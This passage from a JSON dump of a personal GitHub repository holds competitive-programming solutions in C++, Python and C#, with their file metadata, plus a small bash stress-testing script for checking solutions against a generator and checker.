1950)\n break;\n //if (++i % 100 == 99)\n //cerr << i << \"/\" << F << endl;\n if (!i || flows[i - 1].from != f.from)\n trees[0].reset(f.from, f.r, f.to);\n trees[0].addPath(f);\n continue;\n const int MXQ = 2;\n forn(q, MXQ)\n {\n bool found = false;\n forj(TREES)\n if (trees[j].addPath(f))\n {\n found = true;\n break;\n }\n if (found) break;\n if (!found && q + 1 != MXQ)\n forj(TREES)\n trees[j].reset(f.from, f.r * (MXQ - q - 1));\n }\n }\n\n int ans = 0;\n { //PRINT ANSWER\n for (const auto& f: flows) ans += f.path.size() != 0;\n writeln(ans);\n for (const auto& f: flows) if (f.path.size()) writeln(f.id, f.path);\n }\n\n#ifndef ONLINE_JUDGE //{{{\n {\n vector<int> E(m);\n vector<int> N(n);\n vector<set<int>> G(g + 1);\n for (const auto& f: flows)\n {\n if (!f.path.size()) continue;\n set<int> nodesPerPath;\n set<int> edgesPerPath;\n int u = f.from;\n\n for (auto& eid: f.path)\n {\n auto e = edges[eid];\n E[eid] += f.r;\n N[u]++;\n if (!nodesPerPath.insert(u).second)\n writeln(\"NODE\", u, \"ALREADY EXISTS IN FLOW\", f.id);\n G[e.g].insert(f.id);\n if (!edgesPerPath.insert(eid).second)\n writeln(\"EDGE\", eid, \"ALREADY EXISTS IN FLOW\", f.id);\n u = e.getTo(u);\n }\n if (!nodesPerPath.insert(u).second)\n writeln(\"NODE\", u, \"ALREADY EXISTS IN FLOW\", f.id);\n if (u != f.to)\n writeln(\"END IN WRONG NODE\", f.to, \"EXPECTED\", u, \"FOUND\");\n N[u]++;\n }\n fori(m)\n if (E[i] > edges[i].c)\n writeln(\"ERROR EDGE CAPACITY\", i, \"EXPECTED\", edges[i].c, \"FOUND\", E[i]);\n fori(n)\n if (N[i] > NFL)\n writeln(\"ERROR NODE FLOW LIMIT\", i, \"EXPECTED\", NFL, \"FOUND\", N[i]);\n fori(g + 1)\n if (G[i].size() > GFL)\n writeln(\"ERROR GROUP FLOW LIMIT\", i, \"EXPECTED\", GFL, \"FOUND\", G[i].size());\n\n cerr << ans << endl;\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n }\n#endif //}}}\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n return 0;\n}\n\n#define a _a\n#define n 
_n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4898989796638489, "alphanum_fraction": 0.5050504803657532, "avg_line_length": 14.15384578704834, "blob_id": "e27722b3b5b29742e2207ecc98412981af7b5877", "content_id": "29f0725b58a63b336fc328ee85b5e909168ee601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 198, "license_type": "no_license", "max_line_length": 61, "num_lines": 13, "path": "/2021/yandexAlgoQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def convert(x):\n return int(x.replace('one', '1').replace('zero', '0'), 2)\n\n\na = convert(input())\nb = convert(input())\n\nif a == b:\n print('=')\nelif a < b:\n print('<')\nelse:\n print('>')\n\n" }, { "alpha_fraction": 0.4980824589729309, "alphanum_fraction": 0.5146212577819824, "avg_line_length": 25.743589401245117, "blob_id": "575a60ec3078879d7f4a6eda97f657a6f9ee462b", "content_id": "bbe4555727b7eb473e6f19ec73b5744b625b6fe7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4172, "license_type": "no_license", "max_line_length": 174, "num_lines": 156, "path": "/2022/yandexBackend/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// 
Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\ntypedef bitset<1024> bs;\n\nstruct commit {\n ll t;\n bs d;\n};\n\nstruct service {\n int n;\n ll ct;\n bs d;\n\n vector<pair<int, ll>> s;\n\n void add(const vector<commit>& commits)\n {\n int m = commits.size();\n ll last = 0;\n\n int i = 0;\n while (i < m)\n {\n int j = i;\n int c = 0;\n while (j < m)\n {\n bool ok = (commits[j].d & d).any();\n if (ok)\n if (++c == n)\n break;\n ++j;\n }\n if (c == n)\n {\n ll start = max(last, commits[j].t);\n while (j < m && commits[j].t <= start)\n ++j;\n --j;\n if (commits[j].t <= start)\n {\n last = start + ct;\n s.emplace_back(j, last);\n }\n }\n i = j + 1;\n }\n }\n\n ll get(int commit)\n {\n auto it = lower_bound(s.begin(), s.end(), pair(commit, 0ll));\n if (it == s.end())\n return -1;\n else\n return it->second;\n }\n\n service() {}\n};\n\nistream& operator>>(istream& is, service& s)\n{\n int n, x;\n is >> s.n >> s.ct >> n;\n fori(n)\n is >> x,\n s.d.set(x);\n return is;\n}\n\nistream& operator>>(istream& is, commit& c)\n{\n int n, x;\n is >> c.t >> n;\n fori(n)\n is >> x,\n c.d.set(x);\n return is;\n}\n\nvoid run()\n{\n ints(d, s);\n vector<service> services(s);\n readln(services);\n ints(c);\n vector<commit> commits(c);\n readln(commits);\n for (auto& service: services)\n service.add(commits);\n ints(q);\n fori(q)\n {\n ints(commit, service); --commit; --service;\n writeln(services[service].get(commit));\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T 
const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5649999976158142, "alphanum_fraction": 0.5849999785423279, "avg_line_length": 19, "blob_id": "8deafc4a632d8e5fa8f5ee949d3abce0dd3f65c3", "content_id": "b0b669114ba69869c788d5e6989a61612dea9434", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 400, "license_type": "no_license", "max_line_length": 81, "num_lines": 20, "path": "/2017/newYear/E.cs", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "using System;\nusing System.IO;\nusing System.Linq;\nusing System.Numerics;\nusing System.Collections.Generic;\n\nclass Program\n{\n\tstatic void Main()\n\t{\n int[] a = Console.ReadLine().Split().Select(x => int.Parse(x)).ToArray();\n int x1 = a[0];\n int y1 = a[1];\n int x2 = a[2];\n int y2 = a[3];\n int w = int.Parse(Console.ReadLine());\n\n\t\tConsole.WriteLine(ans);\n\t}\n}\n" }, { "alpha_fraction": 0.5013589262962341, "alphanum_fraction": 0.5232613682746887, "avg_line_length": 28.0930233001709, "blob_id": "8bb9a9f49b0f13dfe84562c465169e136e0da313", "content_id": "0c2d83a58f8bb0149b2df50a40badc0581792fb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6255, "license_type": "no_license", "max_line_length": 163, "num_lines": 215, "path": "/CodeForce/1033/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... 
args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//}}}\n\nmap<vector<int>, int> cache;\n\nint query(vector<int>& a)\n{\n sort(whole(a));\n if (a.size() <= 1)\n return 0;\n if (cache.find(a) != cache.end())\n return cache[a];\n writeln('?', a.size());\n writeln(a);\n cout.flush();\n ints(x);\n if (x == -1)\n exit(1);\n cache[a] = x;\n return x;\n}\n\nint dist(vector<int>& a, vector<int>& b)\n{\n //writeln(\"Finding count of edges between\", a, \"and\", b);\n vector<int> c(b);\n for (int& x: a)\n c.pb(x);\n return query(c) - query(a) - query(b);\n}\n\npair<int, int> getEdge(vector<int>& a, vector<int>& b)\n{\n //writeln(\"Finding edge between sets\", a, \"and\", b);\n int n = a.size();\n int m = b.size();\n if (n > 1)\n {\n vector<int> x1, x2;\n fori(n)\n (i % 2 == 0 ? x1 : x2).pb(a[i]);\n //writeln(\"Dividing a into\", x1, \"and\", x2);\n return getEdge(dist(x1, b) ? x1 : x2, b);\n }\n if (m > 1)\n {\n vector<int> y1, y2;\n fori(m)\n (i % 2 == 0 ? y1 : y2).pb(b[i]);\n //writeln(\"Dividing b into\", y1, \"and\", y2);\n return getEdge(a, dist(y1, a) ? y1 : y2);\n }\n //writeln(\"Found edge\", a[0], \"->\", b[0]);\n return {a[0], b[0]};\n}\n\npair<int, int> getEdge2(vector<int>& a)\n{\n //writeln(\"Finding edge in\", a);\n int n = a.size();\n if (n > 2)\n {\n vector<int> x1, x2;\n fori(n)\n (i % 2 == 0 ? x1 : x2).pb(a[i]);\n //writeln(\"Dividing a into\", x1, \"and\", x2);\n int x1s = query(x1);\n int x2s = query(x2);\n if (x1s + x2s == 0)\n return getEdge(x1, x2);\n return getEdge2(x1s ? 
x1 : x2);\n }\n //writeln(\"Found edge\", a[0], \"->\", a[1]);\n return {a[0], a[1]};\n}\n\nvoid run()\n{\n ints(n);\n if (n == 1)\n {\n writeln('Y', 1);\n writeln(1);\n }\n vector<int> left(1, 1);\n vector<int> right;\n for (int i = 2; i <= n; ++i)\n right.pb(i);\n\n vector<vector<int>> edges(n + 1);\n while (right.size())\n {\n auto [f, t] = getEdge(left, right);\n edges[f].pb(t);\n edges[t].pb(f);\n left.pb(t);\n right.erase(lower_bound(whole(right), t));\n }\n left.clear();\n right.clear();\n function<void(int, int, int)> dfs = [&](int u, int p, int depth) {\n (depth % 2 == 0 ? left : right).pb(u);\n for (int& x : edges[u])\n if (x != p)\n dfs(x, u, depth + 1);\n };\n dfs(1, -1, 0);\n int ls = query(left);\n int rs = query(right);\n if (ls + rs == 0)\n {\n writeln('Y', left.size());\n writeln(left);\n return;\n }\n auto [f, t] = getEdge2(ls ? left : right);\n edges[f].pb(t);\n edges[t].pb(f);\n vector<int> used(n + 1, 0);\n vector<int> ans;\n int found = 0;\n function<void(int, int, int)> dfs2 = [&](int u, int p, int depth) {\n if (used[u])\n found = used[u];\n if (found)\n return;\n used[u] = depth;\n ans.pb(u);\n for (int& x : edges[u])\n if (x != p)\n {\n dfs2(x, u, depth + 1);\n if (found) return;\n }\n ans.pop_back();\n };\n dfs2(1, -1, 0);\n fori(found) ans.erase(ans.begin());\n writeln('N', ans.size());\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti 
ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&& a){cout<<\" \"<<a;}\nttti void priws(T&& a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4484441876411438, "alphanum_fraction": 0.47589993476867676, "avg_line_length": 25.868852615356445, "blob_id": "ac0e75091d6060b0b6ee87678ad806a1a4d476f9", "content_id": "26a7f2dac3a82053cc0f4738a6dbc3d20ac6d8c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1639, "license_type": "no_license", "max_line_length": 123, "num_lines": 61, "path": "/atcoder/abc162/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <map>\n#include <numeric>\n#include <iomanip>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n int n;\n string s;\n cin >> n >> s;\n vector<vector<int>> has(n + 1, {0, 0, 0});\n map<char, int> m = {{'R', 0}, {'G', 1}, {'B', 2}};\n ROF(i, n - 1, 0)\n has[i] = has[i + 1],\n has[i][m[s[i]]]++;\n ll ans = 0;\n fori(n)\n FOR(j, i + 1, n)\n if (s[i] != s[j])\n {\n ans += has[j][0] + has[j][1] + has[j][2] - has[j][m[s[i]]] - has[j][m[s[j]]];\n if (int k = j + (j - i); k < n && s[k] != s[i] && s[k] != s[j])\n ans--;\n }\n\n cout << ans << \"\\n\";\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.5274056196212769, "alphanum_fraction": 0.5456759929656982, "avg_line_length": 21.189189910888672, "blob_id": "abd30901c07b50b05a6de44e0bf36d89c8667616", "content_id": "2602eadc302b8a99298c80feb8c2c28b31723495", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 821, "license_type": "no_license", "max_line_length": 115, "num_lines": 37, "path": "/scripts/tester.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "shopt -s nullglob\ndir='.'\n\nif [[ ! 
-z \"$1\" ]]; then\n dir=$1\nfi\ntask=\"$dir/A\"\ncorrect=$2\ngenerator=$3\nchecker=$4\nif [[ -z \"$correct\" ]]; then\n correct=$task\nfi\nif [[ -z \"$generator\" ]]; then\n generator=\"$dir/generator\"\nfi\nif [[ -z \"$checker\" ]]; then\n checker=\"$dir/checker\"\nfi\n\nfor i in $dir/*.cpp; do\n if [[ $i =~ \"*\" ]]; then\n break\n fi\n echo $i\n clang++ -std=c++17 -DONLINE_JUDGE -include /home/igorjan/206round/bits.h -O2 $i -o $i.exe\ndone\n\nstop=\"false\"\nwhile [[ \"false\" = \"$stop\" ]]; do\n $generator 2>/dev/null > \"$task.in\"\n $correct 2>/dev/null < \"$task.in\" > \"$task.a\"\n for i in $dir/*.cpp.exe; do\n $i 2>/dev/null < $task.in > $i.output\n $checker $task.in $i.output $task.a 2>/dev/null || (cp $task.in $i.failed && rm -rf $i && echo \"failed $i\")\n done\ndone\n" }, { "alpha_fraction": 0.517234206199646, "alphanum_fraction": 0.5311461687088013, "avg_line_length": 29.871795654296875, "blob_id": "6984956543d8fc5dc584cfed90cdd048d5e2e74d", "content_id": "560e7d27f1da793de7535132d303cdba3b911a68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4816, "license_type": "no_license", "max_line_length": 167, "num_lines": 156, "path": "/CodeForce/0908/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (#define -> typedef, readln(vector) patched, version from 27 March 2017)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long 
long ll;\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... 
tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\n\nvoid run()\n{\n ll ans = 0;\n map<char, int> prev, mx;\n prev['G'] = prev['R'] = prev['B'] = -1;\n\n ints(n);\n vi x(n);\n\tvector<char> color(n);\n\tfori(n)\n\t\treadln(x[i], color[i]);\n\n auto dist = [&](int i, int j) {\n if (j == -1 || i == -1)\n return 0;\n return abs(x[i] - x[j]);\n };\n\n int i = 0, j = n - 1;\n char R = 'R', B = 'B', G = 'G';\n for (; i < n && color[i] != G; ++i)\n ans += dist(prev[color[i]], i),\n\t\tprev[color[i]] = i;\n if (i < n) ans += dist(prev[R], i) + dist(prev[B], i);\n\n prev[G] = prev[R] = prev[B] = -1;\n\tfor (; j >= i && color[j] != G; --j)\n\t\tans += dist(j, prev[color[j]]),\n\t\tprev[color[j]] = j;\n if (j >= 0) ans += dist(prev[R], j) + dist(prev[B], j);\n\n prev[G] = prev[R] = prev[B] = i;\n for (int q = i; q <= j; ++q)\n {\n if (color[q] == G)\n {\n ll d = dist(q, prev[G]);\n mx[R] = max(mx[R], dist(q, prev[R]));\n mx[B] = max(mx[B], dist(q, prev[B]));\n ans += min(2ll * d, 3ll * d - mx[B] - mx[R]);\n\n mx[R] = mx[B] = 0;\n prev[R] = prev[B] = q;\n }\n else\n mx[color[q]] = max(mx[color[q]], dist(q, prev[color[q]]));\n prev[color[q]] = q;\n }\n\n writeln(ans);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 
0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,valarray<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5423728823661804, "alphanum_fraction": 0.5593220591545105, "avg_line_length": 28.5, "blob_id": "e8500f7b8431411699de3ac34bc633809891f1ee", "content_id": "25e945f042c6d29a1209624baa2c67e6e122939d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 32, "num_lines": 2, "path": "/CodeForce/0805/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "l, r = map(int, input().split())\nprint(l if l == r else 2)\n" }, { "alpha_fraction": 0.46503496170043945, "alphanum_fraction": 0.47785547375679016, "avg_line_length": 18.953489303588867, "blob_id": "acd07b5ce1affcfa1ad4da6968375810c04420b6", "content_id": "591553c21f4e290e145b02e7fa5cd92290f62a7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 71, "num_lines": 43, "path": "/2021/yandexBackendQual/C.py", "repo_name": "Igorjan94/CF", 
"src_encoding": "UTF-8", "text": "def read():\n return list(map(int, input().split()))\n\ndef get(a):\n return '.'.join(map(str, a))\n\n[n, m] = read()\n[w] = read()\nwhites = [read() for i in range(w)]\n[b] = read()\nblacks = [read() for i in range(b)]\nwho = input()\nif who == 'black':\n whites, blacks = blacks, whites\n w, b = b, w\n\nbb = set(map(get, blacks))\nww = set(map(get, whites))\ncan = False\n\ndef exists(x, y):\n return x >= 1 and y >= 1 and x <= n and y <= m\n\ndx = [1, 1, -1, -1]\ndy = [-1, 1, 1, -1]\nfor i in range(w):\n x, y = whites[i]\n for q in range(4):\n u = x + dx[q]\n v = y + dy[q]\n uu = u + dx[q]\n vv = v + dy[q]\n\n if exists(u, v) and exists(uu, vv):\n uuvv = get([uu, vv])\n if get([u, v]) in bb and not uuvv in bb and not uuvv in ww:\n can = True\n\n\nif can:\n print('Yes')\nelse:\n print('No')\n" }, { "alpha_fraction": 0.42898550629615784, "alphanum_fraction": 0.4688405692577362, "avg_line_length": 30.724138259887695, "blob_id": "bc78ce21dc1059e5ca46142eb9a58b9f44db942c", "content_id": "b9f08b4f1700d0d8a5003a98f1a2a49fb5a0a4f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2760, "license_type": "no_license", "max_line_length": 928, "num_lines": 87, "path": "/2013/2013GCJ1stRoundB/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <string>\n#define enter printf(\"\\n\");\n#define ull unsigned long long\n#define ll long long\n#define sort(a) sort(a.begin(), a.end())\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nint n, x, y;\nint co[6][7] = {{1, 2, 0, 0, 0, 0, 0}, {1, 3, 4, 0, 0, 0, 0}, {1, 4, 7, 8, 0, 0, 0}, {1, 5, 11, 15, 16, 0, 0}, {1, 6, 16, 26, 31, 32, 0}, {1, 7, 22, 42, 57, 63, 64}};\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int 
c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\ndouble test()\n{\n readln(n, x, y);\n x = abs(x);\n int i 